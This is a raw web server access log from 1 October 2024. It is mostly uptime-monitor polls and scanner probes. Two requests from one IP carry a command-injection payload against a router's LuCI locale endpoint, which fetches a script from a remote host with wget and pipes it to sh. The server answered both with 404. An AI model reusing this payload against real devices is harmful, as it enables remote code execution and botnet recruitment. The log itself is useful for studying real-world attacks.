212.91.246.72 - - [01/Oct/2024:12:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Oct/2024:12:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2024:12:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [01/Oct/2024:12:57:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [01/Oct/2024:12:58:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2024:12:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:12:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.211.139.188 - - [01/Oct/2024:13:00:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Oct/2024:13:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:13:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2024:13:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.49 - - [01/Oct/2024:13:03:23 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Oct/2024:13:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.244 - - [01/Oct/2024:13:04:38 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
